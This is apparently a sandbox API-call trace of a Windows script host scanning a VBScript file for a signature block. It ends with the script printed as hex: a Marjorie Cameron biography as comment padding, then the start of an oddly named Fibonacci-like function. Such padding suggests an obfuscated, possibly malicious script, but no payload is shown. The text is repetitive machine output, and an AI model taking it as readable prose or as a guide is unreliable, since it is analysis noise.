	[0206.444] wcsncmp (_String1=", and occultist. After serving in", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.444] wcsncmp (_String1=" and occultist. After serving in ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="and occultist. After serving in t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.444] wcsncmp (_String1="nd occultist. After serving in th", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.444] wcsncmp (_String1="d occultist. After serving in the", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.444] wcsncmp (_String1=" occultist. After serving in the ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="occultist. After serving in the n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.444] wcsncmp (_String1="ccultist. After serving in the na", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.444] wcsncmp (_String1="cultist. After serving in the nav", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.444] wcsncmp (_String1="ultist. After serving in the navy", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0206.444] wcsncmp (_String1="ltist. After serving in the navy ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95
	[0206.444] wcsncmp (_String1="tist. After serving in the navy d", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1="ist. After serving in the navy du", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.444] wcsncmp (_String1="st. After serving in the navy dur", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.444] wcsncmp (_String1="t. After serving in the navy duri", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1=". After serving in the navy durin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33
	[0206.444] wcsncmp (_String1=" After serving in the navy during", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="After serving in the navy during ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52
	[0206.444] wcsncmp (_String1="fter serving in the navy during t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0206.444] wcsncmp (_String1="ter serving in the navy during th", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1="er serving in the navy during the", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.444] wcsncmp (_String1="r serving in the navy during the ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.444] wcsncmp (_String1=" serving in the navy during the S", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="serving in the navy during the Se", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.444] wcsncmp (_String1="erving in the navy during the Sec", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.444] wcsncmp (_String1="rving in the navy during the Seco", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.444] wcsncmp (_String1="ving in the navy during the Secon", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0206.444] wcsncmp (_String1="ing in the navy during the Second", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.444] wcsncmp (_String1="ng in the navy during the Second ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.445] wcsncmp (_String1="g in the navy during the Second W", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0206.445] wcsncmp (_String1=" in the navy during the Second Wo", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="in the navy during the Second Wor", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.445] wcsncmp (_String1="n the navy during the Second Worl", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.445] wcsncmp (_String1=" the navy during the Second World", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="the navy during the Second World ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.445] wcsncmp (_String1="he navy during the Second World W", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.445] wcsncmp (_String1="e navy during the Second World Wa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.445] wcsncmp (_String1=" navy during the Second World War", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="navy during the Second World War,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.445] wcsncmp (_String1="avy during the Second World War, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.445] wcsncmp (_String1="vy during the Second World War, \r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0206.445] wcsncmp (_String1="y during the Second World War, \r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0206.445] wcsncmp (_String1=" during the Second World War, \r\n'", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="during the Second World War, \r\n's", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.445] wcsncmp (_String1="uring the Second World War, \r\n'sh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0206.445] wcsncmp (_String1="ring the Second World War, \r\n'she", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.445] wcsncmp (_String1="ing the Second World War, \r\n'she ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.445] wcsncmp (_String1="ng the Second World War, \r\n'she s", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.445] wcsncmp (_String1="g the Second World War, \r\n'she se", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0206.445] wcsncmp (_String1=" the Second World War, \r\n'she set", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="the Second World War, \r\n'she sett", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.445] wcsncmp (_String1="he Second World War, \r\n'she settl", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.445] wcsncmp (_String1="e Second World War, \r\n'she settle", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.445] wcsncmp (_String1=" Second World War, \r\n'she settled", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="Second World War, \r\n'she settled ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70
	[0206.445] wcsncmp (_String1="econd World War, \r\n'she settled i", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.445] wcsncmp (_String1="cond World War, \r\n'she settled in", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.445] wcsncmp (_String1="ond World War, \r\n'she settled in ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.445] wcsncmp (_String1="nd World War, \r\n'she settled in P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.445] wcsncmp (_String1="d World War, \r\n'she settled in Pa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.445] wcsncmp (_String1=" World War, \r\n'she settled in Pas", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="World War, \r\n'she settled in Pasa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74
	[0206.445] wcsncmp (_String1="orld War, \r\n'she settled in Pasad", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.445] wcsncmp (_String1="rld War, \r\n'she settled in Pasade", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.445] wcsncmp (_String1="ld War, \r\n'she settled in Pasaden", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95
	[0206.445] wcsncmp (_String1="d War, \r\n'she settled in Pasadena", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.445] wcsncmp (_String1=" War, \r\n'she settled in Pasadena,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.445] wcsncmp (_String1="War, \r\n'she settled in Pasadena, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74
	[0206.445] wcsncmp (_String1="ar, \r\n'she settled in Pasadena, C", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.445] wcsncmp (_String1="r, \r\n'she settled in Pasadena, Ca", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.445] wcsncmp (_String1=", \r\n'she settled in Pasadena, Cal", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.446] wcsncmp (_String1=" \r\n'she settled in Pasadena, Cali", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.446] wcsncmp (_String1="\r\n'she settled in Pasadena, Calif", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76
	[0206.446] wcsncmp (_String1="\n'she settled in Pasadena, Califo", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0206.446] wcsncmp (_String1="'she settled in Pasadena, Califor", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 26
	[0206.446] wcsncmp (_String1="she settled in Pasadena, Californ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.446] wcsncmp (_String1="he settled in Pasadena, Californi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.446] wcsncmp (_String1="e settled in Pasadena, California", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.446] wcsncmp (_String1=" settled in Pasadena, California.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.446] wcsncmp (_String1="settled in Pasadena, California. ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.446] wcsncmp (_String1="ettled in Pasadena, California. T", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.446] wcsncmp (_String1="ttled in Pasadena, California. Th", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.446] wcsncmp (_String1="tled in Pasadena, California. The", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.446] wcsncmp (_String1="led in Pasadena, California. Ther", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95
	[0206.446] wcsncmp (_String1="ed in Pasadena, California. There", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.446] wcsncmp (_String1="d in Pasadena, California. There ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.446] wcsncmp (_String1=" in Pasadena, California. There s", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.446] wcsncmp (_String1="in Pasadena, California. There sh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.446] wcsncmp (_String1="n Pasadena, California. There she", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.446] wcsncmp (_String1=" Pasadena, California. There she ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.446] wcsncmp (_String1="Pasadena, California. There she m", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67
	[0206.446] wcsncmp (_String1="asadena, California. There she me", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.446] wcsncmp (_String1="sadena, California. There she met", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.446] wcsncmp (_String1="adena, California. There she met ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.446] wcsncmp (_String1="dena, California. There she met t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0206.446] wcsncmp (_String1="ena, California. There she met th", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.446] wcsncmp (_String1="na, California. There she met the", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.446] wcsncmp (_String1="a, California. There she met the ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.446] wcsncmp (_String1=", California. There she met the r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.446] wcsncmp (_String1=" California. There she met the ro", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.446] wcsncmp (_String1="California. There she met the roc", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54
	[0206.446] wcsncmp (_String1="alifornia. There she met the rock", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.446] wcsncmp (_String1="lifornia. There she met the rocke", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95
	[0206.446] wcsncmp (_String1="ifornia. There she met the rocket", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.446] wcsncmp (_String1="fornia. There she met the rocket ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0206.446] wcsncmp (_String1="ornia. There she met the rocket p", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.446] wcsncmp (_String1="rnia. There she met the rocket pi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.446] wcsncmp (_String1="nia. There she met the rocket pio", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.446] wcsncmp (_String1="ia. There she met the rocket pion", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.446] wcsncmp (_String1="a. There she met the rocket pione", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.447] wcsncmp (_String1=". There she met the rocket pionee", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33
	[0206.447] wcsncmp (_String1=" There she met the rocket pioneer", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="There she met the rocket pioneer ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71
	[0206.447] wcsncmp (_String1="here she met the rocket pioneer J", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.447] wcsncmp (_String1="ere she met the rocket pioneer Ja", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1="re she met the rocket pioneer Jac", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.447] wcsncmp (_String1="e she met the rocket pioneer Jack", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1=" she met the rocket pioneer Jack ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="she met the rocket pioneer Jack P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.447] wcsncmp (_String1="he met the rocket pioneer Jack Pa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.447] wcsncmp (_String1="e met the rocket pioneer Jack Par", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1=" met the rocket pioneer Jack Pars", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="met the rocket pioneer Jack Parso", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96
	[0206.447] wcsncmp (_String1="et the rocket pioneer Jack Parson", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1="t the rocket pioneer Jack Parsons", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.447] wcsncmp (_String1=" the rocket pioneer Jack Parsons,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="the rocket pioneer Jack Parsons, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.447] wcsncmp (_String1="he rocket pioneer Jack Parsons, w", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0206.447] wcsncmp (_String1="e rocket pioneer Jack Parsons, wh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1=" rocket pioneer Jack Parsons, who", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="rocket pioneer Jack Parsons, whom", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.447] wcsncmp (_String1="ocket pioneer Jack Parsons, whom ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.447] wcsncmp (_String1="cket pioneer Jack Parsons, whom s", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.447] wcsncmp (_String1="ket pioneer Jack Parsons, whom sh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94
	[0206.447] wcsncmp (_String1="et pioneer Jack Parsons, whom she", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1="t pioneer Jack Parsons, whom she ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.447] wcsncmp (_String1=" pioneer Jack Parsons, whom she m", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="pioneer Jack Parsons, whom she ma", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99
	[0206.447] wcsncmp (_String1="ioneer Jack Parsons, whom she mar", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.447] wcsncmp (_String1="oneer Jack Parsons, whom she marr", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.447] wcsncmp (_String1="neer Jack Parsons, whom she marri", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.447] wcsncmp (_String1="eer Jack Parsons, whom she marrie", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1="er Jack Parsons, whom she married", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.447] wcsncmp (_String1="r Jack Parsons, whom she married ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.447] wcsncmp (_String1=" Jack Parsons, whom she married i", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.447] wcsncmp (_String1="Jack Parsons, whom she married in", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61
	[0206.447] wcsncmp (_String1="ack Parsons, whom she married in ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.447] wcsncmp (_String1="ck Parsons, whom she married in 1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.447] wcsncmp (_String1="k Parsons, whom she married in 19", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94
	[0206.448] wcsncmp (_String1=" Parsons, whom she married in 194", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.448] wcsncmp (_String1="Parsons, whom she married in 1946", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67
	[0206.448] wcsncmp (_String1="arsons, whom she married in 1946.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.448] wcsncmp (_String1="rsons, whom she married in 1946. ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.448] wcsncmp (_String1="sons, whom she married in 1946. A", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.448] wcsncmp (_String1="ons, whom she married in 1946. Af", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.448] wcsncmp (_String1="ns, whom she married in 1946. Aft", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.448] wcsncmp (_String1="s, whom she married in 1946. Afte", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.448] wcsncmp (_String1=", whom she married in 1946. After", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.448] wcsncmp (_String1=" whom she married in 1946. After ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.448] SetLastError (dwErrCode=0xb) 
	[0206.448] GetLastError () returned 0xb
	[0206.448] SetLastError (dwErrCode=0xb) 
	[0206.448] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0206.449] CloseCodeAuthzLevel () returned 0x1
	[0206.449] FreeLibrary (hLibModule=0x7fefdbf0000) returned 1
	[0206.449] ??2@YAPEAX_K@Z () returned 0x629a40
	[0206.449] SysStringLen (param_1="\x27\x4d\x61\x72\x6a\x6f\x72\x69\x65\x20\x43\x61\x6d\x65\x72\x6f\x6e\x20\x28\x41\x70\x72\x69\x6c\x20\x32\x33\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x2c\x20\x70\x6f\x65\x74\x2c\x20\x61\x63\x74\x72\x65\x73\x73\x2c\x20\x61\x6e\x64\x20\x6f\x63\x63\x75\x6c\x74\x69\x73\x74\x2e\x20\x41\x66\x74\x65\x72\x20\x73\x65\x72\x76\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\x20\x6e\x61\x76\x79\x20\x64\x75\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x53\x65\x63\x6f\x6e\x64\x20\x57\x6f\x72\x6c\x64\x20\x57\x61\x72\x2c\x20\x0d\x0a\x27\x73\x68\x65\x20\x73\x65\x74\x74\x6c\x65\x64\x20\x69\x6e\x20\x50\x61\x73\x61\x64\x65\x6e\x61\x2c\x20\x43\x61\x6c\x69\x66\x6f\x72\x6e\x69\x61\x2e\x20\x54\x68\x65\x72\x65\x20\x73\x68\x65\x20\x6d\x65\x74\x20\x74\x68\x65\x20\x72\x6f\x63\x6b\x65\x74\x20\x70\x69\x6f\x6e\x65\x65\x72\x20\x4a\x61\x63\x6b\x20\x50\x61\x72\x73\x6f\x6e\x73\x2c\x20\x77\x68\x6f\x6d\x20\x73\x68\x65\x20\x6d\x61\x72\x72\x69\x65\x64\x20\x69\x6e\x20\x31\x39\x34\x36\x2e\x20\x41\x66\x74\x65\x72\x20\x50\x61\x72\x73\x6f\x6e\x73\x27\x20\x64\x65\x61\x74\x68\x20\x69\x6e\x20\x61\x6e\x20\x65\x78\x70\x6c\x6f\x73\x69\x6f\x6e\x20\x61\x74\x20\x74\x68\x65\x69\x72\x20\x68\x6f\x6d\x65\x20\x69\x6e\x20\x31\x39\x35\x32\x2c\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x20\x63\x61\x6d\x65\x20\x74\x6f\x20\x73\x75\x73\x70\x65\x63\x74\x20\x74\x68\x61\x74\x20\x68\x65\x72\x20\x68\x75\x73\x62\x61\x6e\x64\x20\x68\x61\x64\x20\x62\x65\x65\x6e\x20\x61\x73\x73\x61\x73\x73\x69\x6e\x61\x74\x65\x64\x2c\x20\x61\x6e\x64\x20\x62\x65\x67\x61\x6e\x20\x72\x69\x74\x75\x61\x6c\x73\x20\x74\x6f\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x63\x61\x74\x65\x20\x77\x69\x74\x68\x20\x68\x69\x73\x20\x73\x70\x69\x72\x69\x74\x2e\x20\x53\x68\x65\x20\x77\x61\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x20\x74\x68\x65\x20\x61\x76\x61\x6e\x74\x2d\x67\x61\x72\x64\x65\x20\x61\x72\x74\x69\x73\x74\x69\x63\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x20\x6f\x66\x20\x4c\x6f\x73\x20\x41\x6e\x67\x65\x6c\x65\x73\x3b\x20\x0d\x0a\x27\x61\x6d\x6f\x6e\x67\x20\x68\x65\x72\x20\x66\x72\x69\x65\x6e\x64\x73\x20\x77\x65\x72\x65\x20\x74\x68\x65\x20\x66\x69\x6c\x6d\x6d\x61\x6b\x65\x72\x73\x20\x43\x75\x72\x74\x69\x73\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x20\x61\x6e\x64\x20\x4b\x65\x6e\x6e\x65\x74\x68\x20\x41\x6e\x67\x65\x72\x2e\x20\x53\x68\x65\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x69\x6e\x20\x74\x77\x6f\x20\x6f\x66\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x27\x73\x20\x66\x69\x6c\x6d\x73\x2c\x20\x54\x68\x65\x20\x57\x6f\x72\x6d\x77\x6f\x6f\x64\x20\x53\x74\x61\x72\x20\x61\x6e\x64\x20\x4e\x69\x67\x68\x74\x20\x54\x69\x64\x65\x2c\x20\x61\x73\x20\x77\x65\x6c\x6c\x20\x61\x73\x20\x69\x6e\x20\x0d\x0a\x27\x41\x6e\x67\x65\x72\x27\x73\x20\x66\x69\x6c\x6d\x20\x49\x6e\x61\x75\x67\x75\x72\x61\x74\x69\x6f\x6e\x20\x6f\x66\x20\x74\x68\x65\x20\x50\x6c\x65\x61\x73\x75\x72\x65\x20\x44\x6f\x6d\x65\x2e\x20\x49\x6e\x20\x6c\x61\x74\x65\x72\x20\x79\x65\x61\x72\x73\x2c\x20\x73\x68\x65\x20\x6d\x61\x64\x65\x20\x61\x70\x70\x65\x61\x72\x61\x6e\x63\x65\x73\x20\x69\x6e\x20\x61\x72\x74\x2d\x68\x6f\x75\x73\x65\x20\x66\x69\x6c\x6d\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x62\x79\x20\x4a\x6f\x68\x6e\x20\x43\x68\x61\x6d\x62\x65\x72\x6c\x61\x69\x6e\x20\x61\x6e\x64\x20\x43\x68\x69\x63\x6b\x20\x53\x74\x72\x61\x6e\x64\x2e\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x27\x73\x20\x72\x65\x63\x6f\x67\x6e\x69\x74\x69\x6f\x6e\x20\x61\x73\x20\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x20\x69\x6e\x63\x72\x65\x61\x73\x65\x64\x20\x61\x66\x74\x65\x72\x20\x68\x65\x72\x20\x64\x65\x61\x74\x68\x2c\x20\x61\x6e\x64\x20\x68\x65\x72\x20\x70\x61\x69\x6e\x74\x69\x6e\x67\x73\x20\x77\x65\x72\x65\x20\x73\x68\x6f\x77\x6e\x20\x69\x6e\x20\x65\x78\x68\x69\x62\x69\x74\x69\x6f\x6e\x73\x20\x61\x63\x72\x6f\x73\x73\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x72\x79\x2e\x20\x28\x46\x75\x6c\x6c\x20\x61\x72\x74\x69\x63\x6c\x65\x2e\x2e\x2e\x29\x20\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x49\x66\x20\x4e\x20\x3c\x20\x32\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x4e\x0d\x0a\x20\x20\x45\x6c\x73\x65\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\